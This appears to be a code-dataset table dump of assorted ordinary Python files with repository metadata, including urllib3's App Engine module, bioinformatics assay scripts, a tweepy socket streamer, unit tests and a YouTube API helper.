blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
โ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
โ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
โ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f2d187805986b4813c156c325f0651f991420875 | 898aafc2b28aa68d73a1ed3dd63b62aa775f71cc | /lib/python3.8/site-packages/pip/_vendor/urllib3/contrib/appengine.py | 26e869f35452030771221e5dbcc61029349f6549 | [] | no_license | ChesterNut999/Python_Lab_03_Test_Py_Flask_RestFul_SqlAchemy | 462dc404822043f27e53f932f8149ad3f0315a8d | 5889689cae8b64da4b1706def12c763d6a43b502 | refs/heads/master | 2023-06-22T15:00:58.498000 | 2021-07-13T01:27:47 | 2021-07-13T01:27:47 | 385,432,021 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,034 | py | """
This module provides a pool manager that uses Google App Engine's
`URLFetch Service <https://cloud.google.com/appengine/docs/python/urlfetch>`_.
Example usage::
from pip._vendor.urllib3 import PoolManager
from pip._vendor.urllib3.contrib.appengine import AppEngineManager, is_appengine_sandbox
if is_appengine_sandbox():
# AppEngineManager uses AppEngine's URLFetch API behind the scenes
http = AppEngineManager()
else:
# PoolManager uses a socket-level API behind the scenes
http = PoolManager()
r = http.request('GET', 'https://google.com/')
There are `limitations <https://cloud.google.com/appengine/docs/python/\
urlfetch/#Python_Quotas_and_limits>`_ to the URLFetch service and it may not be
the best choice for your application. There are three options for using
urllib3 on Google App Engine:
1. You can use :class:`AppEngineManager` with URLFetch. URLFetch is
cost-effective in many circumstances as long as your usage is within the
limitations.
2. You can use a normal :class:`~urllib3.PoolManager` by enabling sockets.
Sockets also have `limitations and restrictions
<https://cloud.google.com/appengine/docs/python/sockets/\
#limitations-and-restrictions>`_ and have a lower free quota than URLFetch.
To use sockets, be sure to specify the following in your ``app.yaml``::
env_variables:
GAE_USE_SOCKETS_HTTPLIB : 'true'
3. If you are using `App Engine Flexible
<https://cloud.google.com/appengine/docs/flexible/>`_, you can use the standard
:class:`PoolManager` without any configuration or special environment variables.
"""
from __future__ import absolute_import
import io
import logging
import warnings
from . import _appengine_environ
from ..exceptions import (
HTTPError,
HTTPWarning,
MaxRetryError,
ProtocolError,
TimeoutError,
SSLError,
)
from ..packages.six.moves.urllib.parse import urljoin
from ..request import RequestMethods
from ..response import HTTPResponse
from ..util.retry import Retry
from ..util.timeout import Timeout
try:
from google.appengine.api import urlfetch
except ImportError:
urlfetch = None
log = logging.getLogger(__name__)
class AppEnginePlatformWarning(HTTPWarning):
pass
class AppEnginePlatformError(HTTPError):
pass
class AppEngineManager(RequestMethods):
"""
Connection manager for Google App Engine sandbox applications.
This manager uses the URLFetch service directly instead of using the
emulated httplib, and is subject to URLFetch limitations as described in
the App Engine documentation `here
<https://cloud.google.com/appengine/docs/python/urlfetch>`_.
Notably it will raise an :class:`AppEnginePlatformError` if:
* URLFetch is not available.
* If you attempt to use this on App Engine Flexible, as full socket
support is available.
* If a request size is more than 10 megabytes.
* If a response size is more than 32 megabtyes.
* If you use an unsupported request method such as OPTIONS.
Beyond those cases, it will raise normal urllib3 errors.
"""
def __init__(
self,
headers=None,
retries=None,
validate_certificate=True,
urlfetch_retries=True,
):
if not urlfetch:
raise AppEnginePlatformError(
"URLFetch is not available in this environment."
)
warnings.warn(
"urllib3 is using URLFetch on Google App Engine sandbox instead "
"of sockets. To use sockets directly instead of URLFetch see "
"https://urllib3.readthedocs.io/en/latest/reference/urllib3.contrib.html.",
AppEnginePlatformWarning,
)
RequestMethods.__init__(self, headers)
self.validate_certificate = validate_certificate
self.urlfetch_retries = urlfetch_retries
self.retries = retries or Retry.DEFAULT
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
# Return False to re-raise any potential exceptions
return False
def urlopen(
self,
method,
url,
body=None,
headers=None,
retries=None,
redirect=True,
timeout=Timeout.DEFAULT_TIMEOUT,
**response_kw
):
retries = self._get_retries(retries, redirect)
try:
follow_redirects = redirect and retries.redirect != 0 and retries.total
response = urlfetch.fetch(
url,
payload=body,
method=method,
headers=headers or {},
allow_truncated=False,
follow_redirects=self.urlfetch_retries and follow_redirects,
deadline=self._get_absolute_timeout(timeout),
validate_certificate=self.validate_certificate,
)
except urlfetch.DeadlineExceededError as e:
raise TimeoutError(self, e)
except urlfetch.InvalidURLError as e:
if "too large" in str(e):
raise AppEnginePlatformError(
"URLFetch request too large, URLFetch only "
"supports requests up to 10mb in size.",
e,
)
raise ProtocolError(e)
except urlfetch.DownloadError as e:
if "Too many redirects" in str(e):
raise MaxRetryError(self, url, reason=e)
raise ProtocolError(e)
except urlfetch.ResponseTooLargeError as e:
raise AppEnginePlatformError(
"URLFetch response too large, URLFetch only supports"
"responses up to 32mb in size.",
e,
)
except urlfetch.SSLCertificateError as e:
raise SSLError(e)
except urlfetch.InvalidMethodError as e:
raise AppEnginePlatformError(
"URLFetch does not support method: %s" % method, e
)
http_response = self._urlfetch_response_to_http_response(
response, retries=retries, **response_kw
)
# Handle redirect?
redirect_location = redirect and http_response.get_redirect_location()
if redirect_location:
# Check for redirect response
if self.urlfetch_retries and retries.raise_on_redirect:
raise MaxRetryError(self, url, "too many redirects")
else:
if http_response.status == 303:
method = "GET"
try:
retries = retries.increment(
method, url, response=http_response, _pool=self
)
except MaxRetryError:
if retries.raise_on_redirect:
raise MaxRetryError(self, url, "too many redirects")
return http_response
retries.sleep_for_retry(http_response)
log.debug("Redirecting %s -> %s", url, redirect_location)
redirect_url = urljoin(url, redirect_location)
return self.urlopen(
method,
redirect_url,
body,
headers,
retries=retries,
redirect=redirect,
timeout=timeout,
**response_kw
)
# Check if we should retry the HTTP response.
has_retry_after = bool(http_response.getheader("Retry-After"))
if retries.is_retry(method, http_response.status, has_retry_after):
retries = retries.increment(method, url, response=http_response, _pool=self)
log.debug("Retry: %s", url)
retries.sleep(http_response)
return self.urlopen(
method,
url,
body=body,
headers=headers,
retries=retries,
redirect=redirect,
timeout=timeout,
**response_kw
)
return http_response
def _urlfetch_response_to_http_response(self, urlfetch_resp, **response_kw):
if is_prod_appengine():
# Production GAE handles deflate encoding automatically, but does
# not remove the encoding header.
content_encoding = urlfetch_resp.headers.get("content-encoding")
if content_encoding == "deflate":
del urlfetch_resp.headers["content-encoding"]
transfer_encoding = urlfetch_resp.headers.get("transfer-encoding")
# We have a full response's content,
# so let's make sure we don't report ourselves as chunked data.
if transfer_encoding == "chunked":
encodings = transfer_encoding.split(",")
encodings.remove("chunked")
urlfetch_resp.headers["transfer-encoding"] = ",".join(encodings)
original_response = HTTPResponse(
# In order for decoding to work, we must present the content as
# a file-like object.
body=io.BytesIO(urlfetch_resp.content),
msg=urlfetch_resp.header_msg,
headers=urlfetch_resp.headers,
status=urlfetch_resp.status_code,
**response_kw
)
return HTTPResponse(
body=io.BytesIO(urlfetch_resp.content),
headers=urlfetch_resp.headers,
status=urlfetch_resp.status_code,
original_response=original_response,
**response_kw
)
def _get_absolute_timeout(self, timeout):
if timeout is Timeout.DEFAULT_TIMEOUT:
return None # Defer to URLFetch's default.
if isinstance(timeout, Timeout):
if timeout._read is not None or timeout._connect is not None:
warnings.warn(
"URLFetch does not support granular timeout settings, "
"reverting to total or default URLFetch timeout.",
AppEnginePlatformWarning,
)
return timeout.total
return timeout
def _get_retries(self, retries, redirect):
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect, default=self.retries)
if retries.connect or retries.read or retries.redirect:
warnings.warn(
"URLFetch only supports total retries and does not "
"recognize connect, read, or redirect retry parameters.",
AppEnginePlatformWarning,
)
return retries
# Alias methods from _appengine_environ to maintain public API interface.
is_appengine = _appengine_environ.is_appengine
is_appengine_sandbox = _appengine_environ.is_appengine_sandbox
is_local_appengine = _appengine_environ.is_local_appengine
is_prod_appengine = _appengine_environ.is_prod_appengine
is_prod_appengine_mvms = _appengine_environ.is_prod_appengine_mvms
| [
"[email protected]"
] | |
cfe480d022ad715c760a2b50cc3d97fa9baf03a5 | 5374bd9a9fc8cc07f6966c490a137003ddc64d9b | /VEnCode/scripts/validation.py | 14fa681c8adc40990d15197e91301865df279be4 | [
"BSD-3-Clause"
] | permissive | AndreMacedo88/VEnCode | 31f9f545019f62e0af716395a11961515c229394 | 667c777c6ef12c43e993660e5c695d4d6d43385e | refs/heads/master | 2021-01-06T03:55:44.385885 | 2020-11-24T18:05:38 | 2020-11-24T18:05:38 | 90,248,803 | 0 | 1 | NOASSERTION | 2020-02-04T22:29:39 | 2017-05-04T10:02:48 | Python | UTF-8 | Python | false | false | 4,091 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
""" validation.py: file used to cross-validate VEnCodes found using the FANTOM5 data set. """
import os
import sys
import VEnCode.outside_data
file_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(file_dir)
from VEnCode import internals
import VEnCode.internals_extensions as iext
cell_types = {"hips_assay": "hIPS", "hepG2_assay": "hepatocellular carcinoma cell line: HepG2 ENCODE",
"sclc_chr_accessibility_assay": "small cell lung carcinoma cell line",
"sclc_assay": "small cell lung carcinoma cell line", "h82_assay": "small cell lung carcinoma cell line",
"b_lymph_assay": "B lymphoblastoid cell line- GM12878 ENCODE",
"du145_assay": "prostate cancer cell line:DU145",
"pc_3_assay": "prostate cancer cell line:PC-3"}
# Barakat TS, 2018 assays:
# hips_assay = iext.Assay("BarakatTS2018", "sampling", celltype="hIPS", data="core", parsed=False)
validate_with = internals.BarakatTS2018Data(data="core")
hips_assay_val = iext.Assay("BarakatTS2018", "sampling", celltype="hIPS", data="core", parsed=False,
validate_with=validate_with)
hips_assay_val.to_csv()
# Inoue F, 2017 assays:
hepG2_assay = iext.Assay("InoueF2017", "sampling", celltype="hepatocellular carcinoma cell line: HepG2 ENCODE")
hepG2_assay.to_csv()
validate_with = internals.InoueF2017Data()
hepG2_assay_val = iext.Assay("InoueF2017", "sampling", celltype="hepatocellular carcinoma cell line: HepG2 ENCODE",
validate_with=validate_with)
hepG2_assay_val.to_csv()
# Denny SK, 2016 assays:
sclc_chr_accessibility_assay = iext.Assay("DennySK2016", "sampling",
celltype="small cell lung carcinoma cell line")
# Wang X, 2018 assays:
b_lymph_assay = iext.Assay("WangX2018", "sampling", celltype="B lymphoblastoid cell line: GM12878 ENCODE")
b_lymph_assay.to_csv()
validate_with = internals.Bed("WangX2018")
b_lymph_assay_val = iext.Assay("WangX2018", "sampling", celltype="B lymphoblastoid cell line: GM12878 ENCODE",
validate_with=validate_with)
b_lymph_assay_val.to_csv()
# Christensen CL, 2014 assays:
h82_assay = iext.Assay("ChristensenCL2014", "sampling", celltype="small cell lung carcinoma cell line:NCI-H82",
data="H82", parsed=False)
h82_assay.to_csv()
validate_with = internals.ChristensenCL2014Data(data="H82")
h82_assay_val = iext.Assay("ChristensenCL2014", "sampling", celltype="small cell lung carcinoma cell line:NCI-H82",
data="H82", parsed=False, validate_with=validate_with)
h82_assay_val.to_csv()
h82_controls = iext.NegativeControl("ChristensenCL2014", "sampling", data="H82")
h82_controls.to_csv()
# Liu Y, 2017 assays:
du145_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:DU145", parsed=False)
du145_assay.to_csv()
pc_3_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:PC-3", parsed=False)
pc_3_assay.to_csv()
prostate_cancer_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line", parsed=True)
prostate_cancer_assay.to_csv()
validate_with = internals.BroadPeak("LiuY2017")
du145_assay_val = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:DU145", parsed=False,
validate_with=validate_with)
du145_assay_val.to_csv()
validate_with = internals.BroadPeak("LiuY2017")
pc_3_assay_val = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:PC-3", parsed=False,
validate_with=validate_with)
pc_3_assay_val.to_csv()
validate_with = VEnCode.outside_data.BroadPeak("LiuY2017")
prostate_cancer_assay_val = iext.Assay("LiuY2017", "sampling", cell_type="prostate cancer cell line", parsed=True,
validate_with=validate_with)
prostate_cancer_assay_val.to_csv()
lncap_controls = iext.NegativeControl("LiuY2017", "sampling")
lncap_controls.to_csv()
| [
"[email protected]"
] | |
049f94be6d12bfee0f18ebcd3db8d97694c6293e | 22d8565bf563adcbc38f666dec3b57a1c3fd11f4 | /build/husky/husky_base/catkin_generated/pkg.installspace.context.pc.py | 84e0ed79d5a30c4ff0815b97e19969e016fab682 | [] | no_license | JJHbrams/DynamoP2.0 | 4c4160fcb81b7d6a4f2f0ce10e863fd8aa190a82 | a0d554b0620ac90ea3388ec3c2f5225baa6237c3 | refs/heads/master | 2021-01-03T19:55:42.136766 | 2020-11-11T04:42:43 | 2020-11-11T04:42:43 | 240,215,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include;/usr/include".split(';') if "${prefix}/include;/usr/include" != "" else []
PROJECT_CATKIN_DEPENDS = "diagnostic_updater;hardware_interface;husky_msgs;roscpp;sensor_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lhorizon_legacy;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so".split(';') if "-lhorizon_legacy;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so" != "" else []
PROJECT_NAME = "husky_base"
PROJECT_SPACE_DIR = "/home/mrjohd/Kinodynamic_ws/install"
PROJECT_VERSION = "0.4.2"
| [
"[email protected]"
] | |
ed05634f40ffd828dade32145311476d092888ca | 951bd2ae0de80ebb03cdb5214d06c71b617dbdf6 | /Spark Streaming/TweetRead.py | 744587f609d2ff6dfff0cce8154dc29f2d82a2bd | [] | no_license | albertopformoso/Spark-and-Python-for-Big-Data-with-PySpark | c259fdc1d18e43dd4dbdbfa60c8eaff3080a2781 | 8789a0f0b218a46bd9accca27ca8faaea2ed7cdc | refs/heads/master | 2023-02-23T02:12:38.730739 | 2021-01-24T19:26:29 | 2021-01-24T19:26:29 | 330,278,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,681 | py | from dotenv import load_dotenv, find_dotenv
import tweepy
from tweepy import OAuthHandler
from tweepy import Stream
from tweepy.streaming import StreamListener
import socket
import json
import os
if len(find_dotenv()) == 0:
raise RuntimeError("Can't find your .env file")
# Set up your credentials
consumer_key = os.getenv('API_KEY')
consumer_secret= os.getenv('API_SECRET_KEY')
access_token = os.getenv('ACCESS_TOKEN')
access_secret = os.getenv('ACCESS_TOKEN_SECRET')
class TweetsListener(StreamListener):
def __init__(self, csocket):
self.client_socket = csocket
def on_data(self, data):
try:
msg = json.loads( data )
print( msg['text'].encode('utf-8') )
self.client_socket.send( msg['text'].encode('utf-8') )
return True
except BaseException as e:
print("Error on_data: %s" % str(e))
return True
def on_error(self, status):
print(status)
return True
def sendData(c_socket):
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)
twitter_stream = Stream(auth, TweetsListener(c_socket))
twitter_stream.filter(track=['guitar'])
if __name__ == "__main__":
s = socket.socket() # Create a socket object
host = "127.0.0.1" # Get local machine name
port = 5555 # Reserve a port for your service.
s.bind((host, port)) # Bind to the port
print("Listening on port: %s" % str(port))
s.listen(5) # Now wait for client connection.
c, addr = s.accept() # Establish connection with client.
print( "Received request from: " + str( addr ) )
sendData( c )
| [
"[email protected]"
] | |
f6e7f7cf4f1a49aa64ffb503f49ad5eeb1ce2097 | c6b15c628a185d9f71c91543aac3a90495152c09 | /Python Unit-Testing Course/.idea/VirtualEnvironment/Scripts/easy_install-3.7-script.py | 42bf3bd2e8c73d16b39b6f563df885427bd62bc2 | [] | no_license | reichlj/PythonBsp | 3e47d3b22b75cf1f67d3e47b83b125a1ddbc518d | 51c25370495d3a8847f46a9de1bc8e0d811ae5a7 | refs/heads/master | 2021-06-12T22:32:15.365906 | 2021-05-08T20:44:01 | 2021-05-08T20:44:01 | 173,499,716 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | #!"C:\dev\PythonBsp\Python Unit-Testing Course\.idea\VirtualEnvironment\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
37e98194ea73e6a1e99634dbf212cd5d261da891 | 3fbfabfaaada7b9b77e8a1df8fed4de444070d49 | /session_10/create_db.py | c1c70ca97f2955670dfb74a0e794333f80293c9c | [
"MIT"
] | permissive | dravate/spark_python_course | df36a561ab2cf8f763dd02655319cd6bf5b7876c | 519389fdb21d78cd6d19e1ad2f7c782bc1449a83 | refs/heads/main | 2023-07-08T06:53:27.635106 | 2021-08-03T14:44:55 | 2021-08-03T14:44:55 | 385,127,461 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | import os
import sqlite3
db_filename = 'todo.db'
new_db = not os.path.exists(db_filename)
conn = sqlite3.connect(db_filename)
if new_db:
print ("Please create Schema")
else:
print ("DB is already created - mostly the schema exists")
conn.close()
| [
"[email protected]"
] | |
170b7b398ab61f3b24b1986299996fa4ce73ce29 | d24a6e0be809ae3af8bc8daa6dacfc1789d38a84 | /other_contests/PAST2019/H.py | 5b5e04e27939ddcd508e3e8a2e1ea67db3e4dc3d | [] | no_license | k-harada/AtCoder | 5d8004ce41c5fc6ad6ef90480ef847eaddeea179 | 02b0a6c92a05c6858b87cb22623ce877c1039f8f | refs/heads/master | 2023-08-21T18:55:53.644331 | 2023-08-05T14:21:25 | 2023-08-05T14:21:25 | 184,904,794 | 9 | 0 | null | 2023-05-22T16:29:18 | 2019-05-04T14:24:18 | Python | UTF-8 | Python | false | false | 1,782 | py | def solve(n, c_list, q, s_list):
res = 0
dec_list_n = [0] * n
global_dec = 0
odd_dec = 0
global_min = min(c_list)
odd_min = min(c_list[0::2])
for i in range(q):
s = s_list[i]
if s[0] == "1":
_, x, a = map(int, s.split())
x -= 1
if x % 2 == 0:
x_res = c_list[x] - global_dec - odd_dec - dec_list_n[x]
if x_res >= a:
dec_list_n[x] += a
res += a
odd_min = min(odd_min, x_res - a)
global_min = min(global_min, x_res - a)
else:
x_res = c_list[x] - global_dec - dec_list_n[x]
if x_res >= a:
dec_list_n[x] += a
res += a
global_min = min(global_min, x_res - a)
elif s[0] == "2":
_, a = map(int, s.split())
if odd_min >= a:
odd_dec += a
odd_min -= a
res += a * ((n + 1) // 2)
global_min = min(global_min, odd_min)
else:
_, a = map(int, s.split())
if global_min >= a:
global_dec += a
global_min -= a
odd_min -= a
res += a * n
return res
def main():
n = int(input())
c_list = list(map(int, input().split()))
q = int(input())
s_list = [""] * q
for i in range(q):
s = input()
s_list[i] = s
res = solve(n, c_list, q, s_list)
print(res)
def test():
assert solve(4, [5, 3, 3, 5], 6, ["1 2 1", "2 2", "2 2", "3 100", "3 1", "1 1 3"]) == 9
assert solve(2, [3, 4], 3, ["1 2 9", "2 4", "3 4"]) == 0
if __name__ == "__main__":
test()
main()
| [
"[email protected]"
] | |
2ebb4a3c821548b4cd7fbbd2eed1c70047122136 | e26cfc715513ae3b4393ea918e78ed5f27664dff | /src/textgrid_tools_tests/intervals/common_py/test_merge_intervals.py | f9d043c5f90ec45d259c06d011eee8b6db3d3313 | [
"MIT"
] | permissive | stefantaubert/textgrid-ipa | f4cd52b2c9d53570587b030dec758176229ee5e0 | ada294513315d76db7e91cbbfb7c386a75f84966 | refs/heads/main | 2023-06-09T01:30:18.159171 | 2023-05-30T15:23:18 | 2023-05-30T15:23:18 | 301,960,070 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 965 | py | from textgrid.textgrid import Interval
from textgrid_tools.intervals.common import merge_intervals
def test_component_include_empty():
intervals = (
Interval(0, 1, ""),
Interval(1, 2, "b"),
Interval(2, 3, " "),
Interval(3, 4, "c"),
Interval(4, 5, "d"),
)
result = merge_intervals(list(intervals), "X", False)
assert_interval = Interval(0, 5, "XbX XcXd")
assert result.minTime == assert_interval.minTime
assert result.maxTime == assert_interval.maxTime
assert result.mark == assert_interval.mark
def test_component_ignore_empty():
intervals = (
Interval(0, 1, ""),
Interval(1, 2, "b"),
Interval(2, 3, " "),
Interval(3, 4, "c"),
Interval(4, 5, "d"),
)
result = merge_intervals(list(intervals), "X", True)
assert_interval = Interval(0, 5, "bX XcXd")
assert result.minTime == assert_interval.minTime
assert result.maxTime == assert_interval.maxTime
assert result.mark == assert_interval.mark
| [
"[email protected]"
] | |
103c351cc0110671b6dbd67e7c9bb14049d877a7 | 57235e5fbd29dc5e0b3f24649e15a48935edd65f | /boa3_test/test_sc/list_test/PopListMismatchedTypeArgument.py | 4ae5589168d11ccf6d57b6d11b7eecfc3dd0b849 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | DanPopa46/neo3-boa | ae75543bdc4e0aeadf45578b6b5e4c45b9253557 | e4ef340744b5bd25ade26f847eac50789b97f3e9 | refs/heads/development | 2023-04-01T19:25:08.216180 | 2021-04-15T17:45:38 | 2021-04-15T17:45:38 | 358,663,228 | 0 | 0 | Apache-2.0 | 2021-04-16T16:46:46 | 2021-04-16T16:46:31 | null | UTF-8 | Python | false | false | 79 | py | def pop_test() -> int:
a = [1, 2, 3, 4, 5]
b = a.pop('2')
return b
| [
"[email protected]"
] | |
11f859a7d2ceaac0b717f0b785430b13ea39ee51 | cff2b7c96ca0355a44116f6d18f026da69e412b0 | /script.module.Galaxy/lib/resources/lib/modules/youtube.py | aad8ebbdf56a5370160d29b30a05da9d5af36820 | [
"Beerware"
] | permissive | krazware/therealufo | cc836e4e7049d277205bb590d75d172f5745cb7d | 4d6341c77e8c2cc9faec0f748a9a2d931b368217 | refs/heads/master | 2020-03-19T00:41:22.109154 | 2019-11-12T05:06:14 | 2019-11-12T05:06:14 | 135,496,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,193 | py | # -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @tantrumdev wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Galaxy
# Addon id: plugin.video.Galaxy
# Addon Provider: The Martian
import re,json
from resources.lib.modules import client
from resources.lib.modules import workers
class youtube(object):
def __init__(self, key=''):
self.list = [] ; self.data = []
self.base_link = 'http://www.youtube.com'
self.key_link = '&key=%s' % key
self.playlists_link = 'https://www.googleapis.com/youtube/v3/playlists?part=snippet&maxResults=50&channelId=%s'
self.playlist_link = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&maxResults=50&playlistId=%s'
self.videos_link = 'https://www.googleapis.com/youtube/v3/search?part=snippet&order=date&maxResults=50&channelId=%s'
self.content_link = 'https://www.googleapis.com/youtube/v3/videos?part=contentDetails&id=%s'
self.play_link = 'plugin://plugin.video.youtube/play/?video_id=%s'
def playlists(self, url):
url = self.playlists_link % url + self.key_link
return self.play_list(url)
def playlist(self, url, pagination=False):
cid = url.split('&')[0]
url = self.playlist_link % url + self.key_link
return self.video_list(cid, url, pagination)
def videos(self, url, pagination=False):
cid = url.split('&')[0]
url = self.videos_link % url + self.key_link
return self.video_list(cid, url, pagination)
def play_list(self, url):
try:
result = client.request(url)
result = json.loads(result)
items = result['items']
except:
pass
for i in range(1, 5):
try:
if not 'nextPageToken' in result: raise Exception()
next = url + '&pageToken=' + result['nextPageToken']
result = client.request(next)
result = json.loads(result)
items += result['items']
except:
pass
for item in items:
try:
title = item['snippet']['title']
title = title.encode('utf-8')
url = item['id']
url = url.encode('utf-8')
image = item['snippet']['thumbnails']['high']['url']
if '/default.jpg' in image: raise Exception()
image = image.encode('utf-8')
self.list.append({'title': title, 'url': url, 'image': image})
except:
pass
return self.list
def video_list(self, cid, url, pagination):
try:
result = client.request(url)
result = json.loads(result)
items = result['items']
except:
pass
for i in range(1, 5):
try:
if pagination == True: raise Exception()
if not 'nextPageToken' in result: raise Exception()
page = url + '&pageToken=' + result['nextPageToken']
result = client.request(page)
result = json.loads(result)
items += result['items']
except:
pass
try:
if pagination == False: raise Exception()
next = cid + '&pageToken=' + result['nextPageToken']
except:
next = ''
for item in items:
try:
title = item['snippet']['title']
title = title.encode('utf-8')
try: url = item['snippet']['resourceId']['videoId']
except: url = item['id']['videoId']
url = url.encode('utf-8')
image = item['snippet']['thumbnails']['high']['url']
if '/default.jpg' in image: raise Exception()
image = image.encode('utf-8')
append = {'title': title, 'url': url, 'image': image}
if not next == '': append['next'] = next
self.list.append(append)
except:
pass
try:
u = [range(0, len(self.list))[i:i+50] for i in range(len(range(0, len(self.list))))[::50]]
u = [','.join([self.list[x]['url'] for x in i]) for i in u]
u = [self.content_link % i + self.key_link for i in u]
threads = []
for i in range(0, len(u)):
threads.append(workers.Thread(self.thread, u[i], i))
self.data.append('')
[i.start() for i in threads]
[i.join() for i in threads]
items = []
for i in self.data: items += json.loads(i)['items']
except:
pass
for item in range(0, len(self.list)):
try:
vid = self.list[item]['url']
self.list[item]['url'] = self.play_link % vid
d = [(i['id'], i['contentDetails']) for i in items]
d = [i for i in d if i[0] == vid]
d = d[0][1]['duration']
duration = 0
try: duration += 60 * 60 * int(re.findall('(\d*)H', d)[0])
except: pass
try: duration += 60 * int(re.findall('(\d*)M', d)[0])
except: pass
try: duration += int(re.findall('(\d*)S', d)[0])
except: pass
duration = str(duration)
self.list[item]['duration'] = duration
except:
pass
return self.list
def thread(self, url, i):
try:
result = client.request(url)
self.data[i] = result
except:
return | [
"[email protected]"
] | |
67cfe06d88e3de17422ae039a63a853c1b86bb5e | 064190a2de1ad156e1060f0efdee7e754a96b4bb | /Unit1/1.5.py | 07c1c3c95a554ba8ca6b0432b654b42f2fe5c8eb | [] | no_license | zqy1/pythonCookbook | 7254fadf3fac277b107941bc32e4716de3f7c329 | 89a05a2a4d723fb49548e0e87d2542bd5d07fbee | refs/heads/master | 2020-08-03T17:27:09.351396 | 2015-09-18T13:05:14 | 2015-09-18T13:05:14 | 73,540,483 | 1 | 0 | null | 2016-11-12T08:14:50 | 2016-11-12T08:14:50 | null | UTF-8 | Python | false | false | 1,758 | py | #!/usr/bin/env python
# encoding: utf-8
"""
1.5 ๅฎ็ฐไผๅ
็บง้ๅ
ๆไปฌๆณๅฎ็ฐไธไธช้ๅ๏ผๅฎไผๆ็ปๅฎ็ไผๅ
็บงๆฅๅฏนๅ
็ด ๆๅบ๏ผ
ไธๆฏๆฌก pop ๆไฝๆถ้ฝ่ฟๅไผๅ
็บงๆ้ซ็้ฃไธชๅ
็ด
heapq ๆจกๅๅฝๆฐ:
heappush(heap, item) # ๅฐitemๅๅ
ฅๅ ไธญ
heappop(heap) # ๅฐๅ ไธญๆๅฐ็ๅ
็ด ๅผนๅบ
heappushpop(heap, item) # ๅ
ๅฐitemๅๅ
ฅheapไธญๅๅผนๅบheap็ๅ ้กถๅ
็ด
# ่ฟๆฏไธคๆฌก็จheappush ๅ heappopๅฝๆฐๅฟซ็ๅค
heapreplace(heap,item) # ๅ
popๅๆitemๅๅ
ฅheapไธญ
heapify(x) # ๅฏนๅ่กจx่ฟ่กๅ ๆๅบ๏ผ้ป่ฎคๆฏๅฐ้กถๅ
merge(*iterables) # ๅฐๅคไธชๅ่กจ่ฟ่กๅๅนถ๏ผ็ถๅ่ฟ่กๅ ่ฐๆด๏ผ่ฟๅ็ๆฏๅ่กจ็ๅฏ่ฟญไปฃๅฏน่ฑกใ
nlargest # 1.4ไธญ็จ่ฟ๏ผ่ฟๅๆๅคง็nไธชๅ
็ด
nsmallest # 1.4ไธญ็จ่ฟ๏ผ่ฟๅๆๅฐ็nไธชๅ
็ด
"""
# ๅฉ็จheapๆจกๅๅฎ็ฐไธไธช็ฎๅ็ไผๅ
็บง้ๅ็ฑป
import heapq
class PriorityQueue:
"""ไผๅ
็บง้ๅ็ฑป"""
def __init__(self):
"""ๅๅงๅ๏ผๅฑๆง"""
self._queue = []
self._index = 0
def push(self, item, priority):
"""ไพๆฎ่ดไผๅ
็บงๅฐ็ดขๅผๅ้กนๅๅ
